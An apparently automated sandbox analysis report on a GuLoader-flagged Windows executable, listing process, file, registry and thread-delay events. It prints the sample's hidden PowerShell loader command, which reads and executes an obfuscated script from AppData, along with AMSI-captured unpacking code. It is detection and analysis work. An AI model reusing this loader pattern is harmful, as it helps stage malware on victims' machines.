Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\r5yYt97sfB.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\r5yYt97sfB.exe

File written: C:\Windows\Resources\unthick.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: r5yYt97sfB.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 0000000B.00000002.3798575873.00000000043F8000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Detaljeprojekteringers $Grassersmpoverishing235 $Fyldpladsen82), (Enkesder @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Heliographs = [AppDomain]::Curre
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Pittosporaceae)), $Springiest26).DefineDynamicModule($Fibronuclear, $false).DefineType($Ankerkdes, $Wholesomer, [System.MulticastDeleg

Suspicious powershell command line found

Source: C:\Users\user\Desktop\r5yYt97sfB.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Forebrace7=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Dipterologist.Fra';$Afskalning=$Forebrace7.SubString(15810,3);.$Afskalning($Forebrace7) "
Source: C:\Users\user\Desktop\r5yYt97sfB.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Forebrace7=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Dipterologist.Fra';$Afskalning=$Forebrace7.SubString(15810,3);.$Afskalning($Forebrace7) "			Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02DF891E pushad ; iretd	11_2_02DF891F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02DF8C2F pushfd ; iretd	11_2_02DF8C30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02DF8DDF push esp; iretd	11_2_02DF8DE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04291D64 pushad ; retf	11_2_04291D70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04291039 pushfd ; iretd	11_2_04291088
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_042928FE push ebx; iretd	11_2_042928FF
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04292922 push es; retf	11_2_04292949
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04292108 push esp; retf	11_2_04292109
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04291964 push FFFFFFFCh; iretd	11_2_04291977
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04291B88 push ebp; ret	11_2_04291B8E

Source: C:\Users\user\Desktop\r5yYt97sfB.exe	File created: C:\Users\user\AppData\Local\Temp\nss7012.tmp\nsExec.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto\r5yYt97sfB.exe			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\r5yYt97sfB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\r5yYt97sfB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\r5yYt97sfB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599436	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599216	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598016	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597688	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597563	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597202	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596953	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596724	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596370	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596248	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596137	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595922	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595688	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594990	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593491	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593365	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593213	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593068	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 592938	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3393			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6324			Jump to behavior

Source: C:\Users\user\Desktop\r5yYt97sfB.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss7012.tmp\nsExec.dll

Jump to dropped file

